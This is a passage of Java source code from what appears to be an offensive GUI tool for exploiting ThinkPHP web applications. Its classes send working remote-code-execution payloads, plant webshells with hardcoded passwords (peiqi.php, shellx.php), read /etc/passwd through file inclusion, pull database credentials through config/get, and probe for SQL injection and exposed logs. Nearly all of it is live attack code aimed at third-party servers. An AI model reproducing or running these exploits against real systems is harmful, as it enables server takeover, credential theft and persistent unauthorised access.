39 | add("_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=" + cmd);
40 | add("s=" + cmd + "&_method=__construct&method=get&filter[]=system");
41 | add("s=" + cmd + "&_method=__construct&method&filter[]=system");
42 | }};
43 | for (String payload : payloads) {
44 | try {
45 | String response = HttpRequest.post(payload_url).send(payload).body();
46 | String res = response.substring(0, response.indexOf("<"));
47 | if (res.equals("")) {
48 | return new Result(true, null, response);
49 | }
50 | return new Result(true, null, res);
51 | } catch (Exception e) {
52 | e.printStackTrace();
53 | }
54 | }
55 | return new Result(false, null, null);
56 | }
57 |
58 | @Override
59 | public Result getShell(String url) throws Exception {
60 | String payload_url = url + "/?s=captcha&test=-1";
61 | ArrayList payloads = new ArrayList() {{
62 | add("_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo '' >>peiqi.php");
63 | add("_method=__construct&filter[]=system&method=GET&get[]=echo '' >>peiqi.php");
64 | add("_method=__construct&filter[]=assert&method=GET&get[]=file_put_contents('./peiqi.php','');");
65 | add("_method=__construct&filter[]=assert&method=GET&get[]=copy('', './peiqi.php');");
66 | }};
67 |
68 | for (String payload : payloads) {
69 | try {
70 | HttpRequest.post(payload_url).send(payload).body();
71 | int code = HttpRequest.get(url + "/peiqi.php").code();
72 | if (code == 200) {
73 | return new Result(true, null, url + "/peiqi.php Pass:peiqi");
74 | }
75 | } catch (Exception e) {
76 | e.printStackTrace();
77 | }
78 | }
79 | return new Result(false, null, null);
80 | }
81 | }
82 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5024_5130.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.util.Module;
6 | import com.thinkphp.thinkphpgui.entity.Result;
7 |
8 | import java.util.ArrayList;
9 |
10 |
11 | //ThinkPHP 5.0.22 TO 5.1.29 RCE,5.1.18测试成功
12 | public class tp5024_5130 implements BasePayload {
13 | @Override
14 | public Result checkVUL(String url) throws Exception {
15 | String CheckStr = "PHP Version";
16 | String module = Module.getModule(url);
17 | ArrayList payload_urls = new ArrayList() {{
18 | add(url + "/?s=" + module + "/\\think\\Request/input&filter[]=phpinfo&data=-1");
19 | add(url + "/?s=/" + module + "/\\think\\request/input?data[]=phpinfo()&filter=assert");
20 | }};
21 | for (String payload_url : payload_urls) {
22 | try {
23 | HttpRequest req1 = HttpRequest.get(payload_url);
24 | if (req1.body().contains(CheckStr)) {
25 | return new Result(true, "ThinkPHP 5.0.24-5.1.30 RCE", payload_url);
26 | }
27 | } catch (Exception e) {
28 | e.printStackTrace();
29 | }
30 | }
31 | return new Result(false, "ThinkPHP 5.0.24-5.1.30 RCE", null);
32 | }
33 |
34 | @Override
35 | public Result exeVUL(String url, String cmd) throws Exception {
36 | String module = Module.getModule(url);
37 | try {
38 | String payload_url = url + "/?s=" + module + "/\\think\\Request/input&filter=system&data=" + cmd;
39 | HttpRequest req = HttpRequest.get(payload_url);
40 | String res = req.body();
41 | return new Result(true, null, res);
42 | } catch (Exception e) {
43 | e.printStackTrace();
44 | }
45 | return new Result(false, null, null);
46 | }
47 |
48 | @Override
49 | public Result getShell(String url) throws Exception {
50 | String module = Module.getModule(url);
51 | try {
52 | String payload_url = url + "/?s=" + module + "/\\think\\Request/input&filter=system&data=echo '' >>peiqi.php";
53 | HttpRequest.get(payload_url).code();
54 | int code = HttpRequest.get(url + "/peiqi.php").code();
55 | if (code == 200) {
56 | return new Result(true, null, url + "/peiqi.php Pass:peiqi");
57 | }
58 | } catch (Exception e) {
59 | e.printStackTrace();
60 | }
61 | return new Result(false, null, null);
62 | }
63 | }
64 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5_db.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.util.Module;
6 | import com.thinkphp.thinkphpgui.entity.Result;
7 |
8 | import java.util.ArrayList;
9 |
10 |
11 | public class tp5_db implements BasePayload {
12 | @Override
13 | public Result checkVUL(String url) throws Exception {
14 | String module = Module.getModule(url);
15 | ArrayList payload_urls = new ArrayList() {{
16 | add(url + "/?s=" + module + "/think\\config/get&name=database.username");
17 | add(url + "/?s=" + module + "/think\\config/get&name=database.hostname");
18 | add(url + "/?s=" + module + "/think\\config/get&name=database.password");
19 | add(url + "/?s=" + module + "/think\\config/get&name=database.database");
20 | }};
21 | try {
22 | String username = HttpRequest.get(payload_urls.get(0)).body();
23 | if (username.length() >= 20) {
24 | username = null;
25 | }
26 | String hostname = HttpRequest.get(payload_urls.get(1)).body();
27 | if (hostname.length() >= 20) {
28 | hostname = null;
29 | }
30 | String password = HttpRequest.get(payload_urls.get(2)).body();
31 | if (password.length() >= 40) {
32 | password = null;
33 | }
34 | String database = HttpRequest.get(payload_urls.get(3)).body();
35 | if (database.length() >= 20) {
36 | database = null;
37 | }
38 | if (username == null && hostname == null && password == null && database == null) {
39 | return new Result(false, "ThinkPHP 5.x 数据库信息泄露", null);
40 | } else {
41 | return new Result(true, "ThinkPHP 5.x 数据库信息泄露", "username:" + username + " hostname:" + hostname + " password:" + password + " database:" + database);
42 | }
43 | } catch (Exception e) {
44 | e.printStackTrace();
45 | }
46 | return new Result(false, "ThinkPHP 5.x 数据库信息泄露", null);
47 | }
48 |
49 | @Override
50 | public Result exeVUL(String url, String cmd) throws Exception {
51 | return new Result(false, null, null);
52 | }
53 |
54 | @Override
55 | public Result getShell(String url) throws Exception {
56 | return new Result(false, null, null);
57 | }
58 | }
59 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5_file_inclusion.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | import java.util.ArrayList;
8 |
9 | public class tp5_file_inclusion implements BasePayload {
10 | @Override
11 | public Result checkVUL(String url) throws Exception {
12 |
13 | ArrayList payloads = new ArrayList<>();
14 | payloads.add(url + "/?s=index/\\think\\Lang/load&file=/etc/passwd");
15 | payloads.add(url + "/?s=index/\\think\\Lang/load&file=C:\\WINDOWS\\win.ini");
16 | payloads.add(url + "/?s=index/\\think\\Config/load&file=/etc/passwd");
17 | payloads.add(url + "/?s=index/\\think\\Config/load&file=C:\\WINDOWS\\win.ini");
18 |
19 | for (String payload : payloads) {
20 | try {
21 | String res = HttpRequest.get(payload).body();
22 | if (res.contains(":x:") || res.contains("for 16-bit app support")) {
23 | return new Result(true, "ThinkPHP 5 文件包含漏洞", payload);
24 | }
25 | } catch (Exception e) {
26 | e.printStackTrace();
27 | }
28 | }
29 | return new Result(false, "ThinkPHP 5 文件包含漏洞", null);
30 | }
31 |
32 | @Override
33 | public Result exeVUL(String url, String cmd) throws Exception {
34 | return new Result(false, null, null);
35 | }
36 |
37 | @Override
38 | public Result getShell(String url) throws Exception {
39 | return new Result(false, null, null);
40 | }
41 | }
42 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5_info_leak.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | public class tp5_info_leak implements BasePayload {
8 | @Override
9 | public Result checkVUL(String url) throws Exception {
10 | String CheckStr = "Trace";
11 | String payload = url + "/index.php?s=example";
12 | try {
13 | HttpRequest req = HttpRequest.get(payload);
14 | if (req.body().contains(CheckStr)) {
15 | return new Result(true, "ThinkPHP 5 信息泄露漏洞(CVE-2022-25481)", payload);
16 | }
17 | } catch (Exception e) {
18 | e.printStackTrace();
19 | }
20 | return new Result(false, "ThinkPHP 5 信息泄露漏洞(CVE-2022-25481)", null);
21 | }
22 |
23 | @Override
24 | public Result exeVUL(String url, String cmd) throws Exception {
25 | return new Result(false, null, null);
26 | }
27 |
28 | @Override
29 | public Result getShell(String url) throws Exception {
30 | return new Result(false, null, null);
31 | }
32 | }
33 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5_log.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | import java.util.ArrayList;
8 | import java.util.Date;
9 |
10 |
11 | public class tp5_log implements BasePayload {
12 | @Override
13 | public Result checkVUL(String url) throws Exception {
14 | String CheckStr = "[ info ]";
15 | String CheckErr = "[ error ]";
16 | Date dt = new Date();
17 | String year = String.format("%tY", dt);
18 | String mon = String.format("%tm", dt);
19 | String day = String.format("%td", dt);
20 | ArrayList payload_urls = new ArrayList() {{
21 | add(url + "/runtime/log/" + year + mon + "/" + day + ".log");
22 | add(url + "/runtime/log/" + year + mon + "/" + day + "_cli.log");
23 | add(url + "/runtime/log/" + year + mon + "/" + day + "_error.log");
24 | add(url + "/runtime/log/" + year + mon + "/" + day + "_sql.log");
25 | }};
26 | try {
27 | for (String payload_url : payload_urls) {
28 | String res = HttpRequest.get(payload_url).body();
29 | if (res.contains(CheckStr) || res.contains(CheckErr)) {
30 | return new Result(true, "ThinkPHP 5.x 日志泄露", payload_url);
31 | }
32 | }
33 |
34 | } catch (Exception e) {
35 | e.printStackTrace();
36 | }
37 |
38 | return new Result(false, "ThinkPHP 5.x 日志泄露", null);
39 | }
40 |
41 | @Override
42 | public Result exeVUL(String url, String cmd) throws Exception {
43 | return new Result(false, null, null);
44 | }
45 |
46 | @Override
47 | public Result getShell(String url) throws Exception {
48 | return new Result(false, null, null);
49 | }
50 | }
51 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5_method_filter_rce.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | import java.util.ArrayList;
8 |
9 |
10 | public class tp5_method_filter_rce implements BasePayload {
11 | @Override
12 | public Result checkVUL(String url) throws Exception {
13 | String CheckStr = "f7e0b956540676a129760a3eae309294";
14 | ArrayList payloads = new ArrayList<>();
15 | payloads.add(url + "/public/index.php?c=var_dump&f=md5(2333)&_method=filter");
16 | payloads.add(url + "/index.php?c=var_dump&f=md5(2333)&_method=filter");
17 |
18 | for (String payload : payloads) {
19 | try {
20 | String res = HttpRequest.get(payload).body();
21 | if (res.contains(CheckStr)) {
22 | return new Result(true, "ThinkPHP 5 method filter RCE", payload);
23 | }
24 | } catch (Exception e) {
25 | e.printStackTrace();
26 | }
27 | }
28 | return new Result(false, "ThinkPHP 5 method filter RCE", null);
29 | }
30 |
31 |
32 | @Override
33 | public Result exeVUL(String url, String cmd) throws Exception {
34 | ArrayList payloads = new ArrayList<>();
35 | payloads.add(url + "/public/index.php?c=system&f=" + cmd + "&_method=filter");
36 | payloads.add(url + "/index.php?c=system&f=" + cmd + "&_method=filter");
37 | for (String payload : payloads) {
38 | try {
39 | HttpRequest res = HttpRequest.get(payload);
40 | if (res.serverError()) {
41 | return new Result(true, null, res.body());
42 | }
43 | } catch (Exception e) {
44 | e.printStackTrace();
45 | }
46 | }
47 |
48 | return new Result(false, null, null);
49 | }
50 |
51 | @Override
52 | public Result getShell(String url) throws Exception {
53 | return new Result(false, null, null);
54 | }
55 | }
56 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5_session_include.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 | import com.thinkphp.thinkphpgui.util.Tools;
7 |
8 | import java.io.UnsupportedEncodingException;
9 | import java.net.URLEncoder;
10 | import java.nio.charset.StandardCharsets;
11 | import java.util.*;
12 |
13 | //payload by bewhale
14 | public class tp5_session_include implements BasePayload {
15 | ArrayList routers = new ArrayList<>(Arrays.asList("/index.php?s=captcha", "/index.php/index", "/index.php?s=index/index/index"));
16 |
17 | @Override
18 | public Result checkVUL(String url) throws Exception {
19 |
20 | String randomStr = Tools.getRandomString(25).toLowerCase();
21 | String payload = "_method=__construct&filter[]=think\\Session::set&method=get&get[]=test&server[]=1";
22 | for (String route : routers) {
23 | try {
24 | String payload_uri = url + route;
25 | HttpRequest v = HttpRequest.post(payload_uri).header("Cookie", "PHPSESSID=" + randomStr).send(payload);
26 | if (v.serverError()) {
27 | payload = "_method=__construct&method=GET&filter[]=think\\__include_file&get[]=/tmp/sess_" + randomStr + "&server[]=1";
28 | String res = HttpRequest.post(payload_uri).header("Cookie", "PHPSESSID=" + randomStr).send(payload).body();
29 | if (res.contains("think|a:")) {
30 | return new Result(true, "ThinkPHP 5 session include", payload_uri + " Post:" + payload);
31 | }
32 | }
33 | } catch (Exception e) {
34 | e.printStackTrace();
35 | }
36 | }
37 |
38 | return new Result(false, "ThinkPHP 5 session include", null);
39 | }
40 |
41 | @Override
42 | public Result exeVUL(String url, String cmd) throws Exception {
43 | return new Result(false, null, null);
44 | }
45 |
46 | //payload by bewhale
47 | @Override
48 | public Result getShell(String url) throws Exception {
49 | String shell_content = "";
50 | String base64_content = Base64.getEncoder().encodeToString(shell_content.getBytes(StandardCharsets.UTF_8));
51 | ArrayList payloads = new ArrayList<>();
52 | try {
53 | String exp1 = "file_put_contents('shellx.php',base64_decode('" + base64_content + "'));";
54 | String exp2 = Base64.getEncoder().encodeToString(exp1.getBytes(StandardCharsets.UTF_8));
55 | String exp3 = "";
56 | String payload1 = "_method=__construct&filter[]=think\\Session::set&method=get&get[]=&server[]=1";
57 | String payload2 = "_method=__construct&filter[]=think\\Session::set&method=get&get[]=&server[]=1";
58 | String payload3 = "_method=__construct&filter[]=think\\Session::set&method=get&get[]=" + URLEncoder.encode(exp3, "UTF-8") + "&server[]=1";
59 | String payload4 = "_method=__construct&filter[]=think\\Session::set&method=get&get[]=" + shell_content + "&server[]=1";
60 | String payload5 = "_method=__construct&filter[]=think\\Session::set&method=get&get[]=" + this.bypass("") + "&server[]=1";
61 | String payload6 = "_method=__construct&filter[]=think\\Session::set&method=get&get[]=" + this.bypass(shell_content) + "&server[]=1";
62 | payloads.add(payload3);
63 | payloads.add(payload1);
64 | payloads.add(payload2);
65 | payloads.add(payload4);
66 | payloads.add(payload5);
67 | payloads.add(payload6);
68 | for (String route : routers) {
69 | int ct = 0;
70 | for (String payload : payloads) {
71 | ct += 1;
72 | String randomStr = Tools.getRandomString(25).toLowerCase();
73 | Map headers = new HashMap<>();
74 | headers.put("Content-type", "application/x-www-form-urlencoded");
75 | headers.put("Cookie", "PHPSESSID=" + randomStr);
76 | HttpRequest res = HttpRequest.post(url + route).headers(headers).send(payload);
77 | if (res.serverError()) {
78 | payload = "_method=__construct&method=GET&filter[]=think\\__include_file&get[]=/tmp/sess_" + randomStr + "&server[]=1";
79 | if (ct > 3) {
80 | payload = "_method=__construct&filter[]=strrev&filter[]=think\\__include_file&method=get&server[]=1&get[]=" + (new StringBuilder(randomStr)).reverse() + "_sses/pmt/=ecruoser/edoced-46esab.trevnoc=daer/retlif//:php";
81 | }
82 | String res0 = HttpRequest.post(url + route).headers(headers).send(payload).body();
83 | HttpRequest res1 = HttpRequest.post(url + "/shellx.php");
84 | if (res1.ok()) {
85 | return new Result(true, null, url + "/shellx.php" + " Pass:nex");
86 | }
87 |
88 | if (res0.contains("think|a:")) {
89 | if (ct == 3) {
90 | return new Result(true, null, "可以尝试无文件落地GetShell,连接方式:\n[+] 请求方式: POST\n[+] URL: " + url + route + "\n[+] POST参数: " + payload);
91 | }
92 | return new Result(false, null, "存在session包含漏洞,但上传失败, 请确认目录是否有写入权限!");
93 | }
94 | }
95 |
96 | }
97 | }
98 |
99 | } catch (Exception e) {
100 | e.printStackTrace();
101 | return new Result(false, null, null);
102 | }
103 |
104 | return new Result(false, null, null);
105 | }
106 |
107 | public String bypass(String content) throws UnsupportedEncodingException {
108 | String temp = Base64.getEncoder().encodeToString(content.getBytes(StandardCharsets.UTF_8));
109 | if (temp.length() == 98) {
110 | content = content.replace("?>", ";?>");
111 | content = Base64.getEncoder().encodeToString(content.getBytes(StandardCharsets.UTF_8));
112 | } else {
113 | content = temp;
114 | }
115 |
116 | content = content.replace("=", "+");
117 | if (content.length() < 7) {
118 | content = "abc" + content;
119 | }
120 |
121 | if (content.length() < 98) {
122 | content = "ab" + content;
123 | }
124 |
125 | if (content.length() > 98 && content.length() < 997) {
126 | content = "a" + content;
127 | }
128 |
129 | content = URLEncoder.encode(content, "UTF-8");
130 | return content;
131 | }
132 | }
133 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5_showid_rce.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | import java.time.LocalDate;
8 | import java.time.format.DateTimeFormatter;
9 |
10 | public class tp5_showid_rce implements BasePayload {
11 | @Override
12 | public Result checkVUL(String url) throws Exception {
13 | String CheckStr = "56540676a129760a3";
14 |
15 | String payload = url + "/index.php?s=my-show-id-%5Cx5C..%5Cx5CTpl%5Cx5C8edy%5Cx5CHome%5Cx5Cmy_1%7B~var_dump(md5(2333))%7D%5D";
16 |
17 | try {
18 | HttpRequest.get(payload).code();
19 |
20 | LocalDate date = LocalDate.now();
21 | DateTimeFormatter formatter = DateTimeFormatter.ofPattern("yy_MM_dd");
22 |
23 | String payload_v = url + "/index.php?s=my-show-id-\\x5C..\\x5CRuntime\\x5CLogs\\x5C" + date.format(formatter) + ".log'";
24 | String res = HttpRequest.get(payload_v).body();
25 | if (res.contains(CheckStr)) {
26 | return new Result(true, "ThinkPHP 5 show-id RCE", payload);
27 | }
28 | } catch (Exception e) {
29 | e.printStackTrace();
30 | }
31 |
32 | return new Result(false, "ThinkPHP 5 show-id RCE", null);
33 | }
34 |
35 | @Override
36 | public Result exeVUL(String url, String cmd) throws Exception {
37 | String payload = url + "/index.php?s=my-show-id-\\x5C..\\x5CTpl\\x5C8edy\\x5CHome\\x5Cmy_1{~system(\"" + cmd + "\")}]";
38 |
39 | try {
40 | HttpRequest.get(payload).code();
41 | LocalDate date = LocalDate.now();
42 | DateTimeFormatter formatter = DateTimeFormatter.ofPattern("yy_MM_dd");
43 | String payload_v = url + "/index.php?s=my-show-id-\\x5C..\\x5CRuntime\\x5CLogs\\x5C" + date.format(formatter) + ".log'";
44 | HttpRequest res = HttpRequest.get(payload_v);
45 | if (res.serverError()) {
46 | return new Result(true, null, res.body());
47 | }
48 | } catch (Exception e) {
49 | e.printStackTrace();
50 | }
51 | return new Result(false, null, null);
52 | }
53 |
54 | @Override
55 | public Result getShell(String url) throws Exception {
56 | return new Result(false, null, null);
57 | }
58 | }
59 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5_sql.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | public class tp5_sql implements BasePayload {
8 | @Override
9 | public Result checkVUL(String url) throws Exception {
10 | String CheckStr = "XPATH";
11 | String payload = url + "/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1";
12 | try {
13 | HttpRequest req = HttpRequest.get(payload);
14 | if (req.body().contains(CheckStr)) {
15 | return new Result(true, "ThinkPHP 5 SQL注入漏洞 && 敏感信息泄露", payload);
16 | }
17 | } catch (Exception e) {
18 | e.printStackTrace();
19 | }
20 | return new Result(false, "ThinkPHP 5 SQL注入漏洞 && 敏感信息泄露", null);
21 | }
22 |
23 | @Override
24 | public Result exeVUL(String url, String cmd) throws Exception {
25 | return new Result(false, null, null);
26 | }
27 |
28 | @Override
29 | public Result getShell(String url) throws Exception {
30 | return new Result(false, null, null);
31 | }
32 | }
33 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp6_lang.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | public class tp6_lang implements BasePayload {
8 | @Override
9 | public Result checkVUL(String url) throws Exception {
10 | int CheckCode = 500;
11 | String payload = url + "/?lang=../../../../../public/index";
12 | try {
13 | HttpRequest req = HttpRequest.get(payload);
14 | if (req.code() == CheckCode) {
15 | return new Result(true, "ThinkPHP 6 文件包含漏洞", payload + " (注意漏洞利用条件苛刻,最好结合手动利用;工具不可执行命令,可尝试点击GETSHELL按钮!)");
16 | }
17 | } catch (Exception e) {
18 | e.printStackTrace();
19 | }
20 | return new Result(false, "ThinkPHP 6 文件包含漏洞", null);
21 | }
22 |
23 | @Override
24 | public Result exeVUL(String url, String cmd) throws Exception {
25 | return new Result(false, null, null);
26 | }
27 |
28 | @Override
29 | public Result getShell(String url) throws Exception {
30 | try {
31 | String payload_url = url + "/?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/+shellx.php";
32 | int get = HttpRequest.get(payload_url).code();
33 | int code = HttpRequest.get(url + "/shellx.php").code();
34 | if (code == 200) {
35 | return new Result(true, null, url + "/shellx.php Pass:nex (用蚁剑连接)");
36 | }
37 | } catch (Exception e) {
38 | e.printStackTrace();
39 | }
40 | return new Result(false, null, null);
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp6_log.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | import java.util.ArrayList;
8 | import java.util.Date;
9 |
10 |
11 | public class tp6_log implements BasePayload {
12 | @Override
13 | public Result checkVUL(String url) throws Exception {
14 | Date dt = new Date();
15 | String year = String.format("%tY", dt);
16 | String CheckStr = "RunTime";
17 | String CheckErr = "[ error ]";
18 | String mon = String.format("%tm", dt);
19 | String day = String.format("%td", dt);
20 | String suffix1 = year + mon + "/" + day + ".log";
21 | ArrayList payload_urls = new ArrayList() {{
22 | add(url + "/runtime/log/" + suffix1);
23 | add(url + "/runtime/log/Home/" + suffix1);
24 | add(url + "/runtime/log/Common/" + suffix1);
25 | add(url + "/runtime/log/Admin/" + suffix1);
26 | }};
27 | try {
28 | for (String payload_url : payload_urls) {
29 | String res = HttpRequest.get(payload_url).body();
30 | if (res.contains(CheckStr) || res.contains(CheckErr)) {
31 | return new Result(true, "ThinkPHP 6.x 日志泄露", payload_url);
32 | }
33 | }
34 | } catch (Exception e) {
35 | e.printStackTrace();
36 | }
37 | return new Result(false, "ThinkPHP 6.x 日志泄露", null);
38 | }
39 |
40 | @Override
41 | public Result exeVUL(String url, String cmd) throws Exception {
42 | return new Result(false, null, null);
43 | }
44 |
45 | @Override
46 | public Result getShell(String url) throws Exception {
47 | return new Result(false, null, null);
48 | }
49 | }
50 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp6_session_file_write.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 | import com.thinkphp.thinkphpgui.util.Tools;
7 |
8 | import java.util.HashMap;
9 | import java.util.Map;
10 |
11 | public class tp6_session_file_write implements BasePayload {
12 | @Override
13 | public Result checkVUL(String url) throws Exception {
14 | String randStr = Tools.getRandomString(7);
15 | url = url + "/" + randStr + ".php";
16 | Map headers = new HashMap<>();
17 | headers.put("Cookie", "PHPSESSID=../../../../public/" + randStr + ".php");
18 | try {
19 | String res = HttpRequest.get(url).headers(headers).body();
20 | if (res.contains("a:1:{s:4:\"name\";s:8:\"thinkphp\";}")) {
21 | return new Result(true, "ThinkPHP 6 session文件写入", "headers: Cookie: PHPSESSID=../../../../public/" + randStr + ".php");
22 | }
23 | } catch (Exception e) {
24 | e.printStackTrace();
25 | }
26 | return new Result(false, "ThinkPHP 6 session文件写入", null);
27 | }
28 |
29 | @Override
30 | public Result exeVUL(String url, String cmd) throws Exception {
31 | return new Result(false, null, null);
32 | }
33 |
34 | @Override
35 | public Result getShell(String url) throws Exception {
36 | return new Result(false, null, null);
37 | }
38 | }
39 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp_catch.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | public class tp_catch implements BasePayload {
8 | @Override
9 | public Result checkVUL(String url) throws Exception {
10 | String payload = url + "/index.php/Home/Index/index.html";
11 | try {
12 | String res = HttpRequest.post(payload).header("Content-type", "application/x-www-form-urlencoded").send("a3=%0d%0avar_dump(\"test\");%0d%0a//").body();
13 | if (res.contains("string(4) \"test\"")) {
14 | return new Result(true, "ThinkPHP catch 命令执行漏洞", payload + " Post: a3=%0d%0avar_dump(\"test\");%0d%0a//");
15 | }
16 | } catch (Exception e) {
17 | e.printStackTrace();
18 | }
19 | return new Result(false, "ThinkPHP catch 命令执行漏洞", null);
20 | }
21 |
22 | @Override
23 | public Result exeVUL(String url, String cmd) throws Exception {
24 | String payload = url + "/index.php/Home/Index/index.html";
25 | try {
26 | String res = HttpRequest.post(payload).header("Content-type", "application/x-www-form-urlencoded").send("a3=%0d%0asystem(\"" + cmd + "\");%0d%0a//").body();
27 | return new Result(true, null, res);
28 | } catch (Exception e) {
29 | e.printStackTrace();
30 | }
31 | return new Result(false, null, null);
32 | }
33 |
34 | @Override
35 | public Result getShell(String url) throws Exception {
36 | return new Result(false, null, null);
37 | }
38 | }
39 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp_checkcode_time_sqli.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | import java.time.LocalTime;
8 | import java.util.HashMap;
9 | import java.util.Map;
10 |
11 | public class tp_checkcode_time_sqli implements BasePayload {
12 | @Override
13 | public Result checkVUL(String url) throws Exception {
14 | LocalTime start_time = LocalTime.now();
15 | Map headers = new HashMap<>();
16 | headers.put("Content-Type", "multipart/form-data; boundary=--------641902708");
17 | headers.put("Accept-Encoding", "gzip, deflate, sdch");
18 | String payload_uri = url + "/index.php?s=/home/user/checkcode/";
19 | String payload = "----------641902708\r\nContent-Disposition: form-data; name=\"couponid\"\r\n\r\n1')UniOn SelEct slEEp(8)#\r\n\r\n----------641902708--";
20 |
21 | try {
22 | HttpRequest.post(payload_uri).headers(headers).send(payload).code();
23 | if (LocalTime.now().compareTo(start_time) >= 8) {
24 | return new Result(true, "ThinkPHP check-code sql注入漏洞", payload_uri + " Post:" + payload);
25 | }
26 | } catch (Exception e) {
27 | e.printStackTrace();
28 | }
29 | return new Result(false, "ThinkPHP check-code sql注入漏洞", null);
30 | }
31 |
32 | @Override
33 | public Result exeVUL(String url, String cmd) throws Exception {
34 | return new Result(false, null, null);
35 | }
36 |
37 | @Override
38 | public Result getShell(String url) throws Exception {
39 | return new Result(false, null, null);
40 | }
41 | }
42 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp_multi_sql_leak.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 | import java.util.ArrayList;
7 |
8 | public class tp_multi_sql_leak implements BasePayload {
9 | @Override
10 | public Result checkVUL(String url) throws Exception {
11 | ArrayList routes = new ArrayList<>();
12 | routes.add("/index.php?s=/home/shopcart/getPricetotal/tag/1%27");
13 | routes.add("/index.php?s=/home/shopcart/getpriceNum/id/1%27");
14 | routes.add("/index.php?s=/home/user/cut/id/1%27");
15 | routes.add("/index.php?s=/home/service/index/id/1%27");
16 | routes.add("/index.php?s=/home/pay/chongzhi/orderid/1%27");
17 | routes.add("/index.php?s=/home/pay/chongzhi/orderid/1%27");
18 | routes.add("/index.php?s=/home/order/complete/id/1%27");
19 | routes.add("/index.php?s=/home/order/detail/id/1%27");
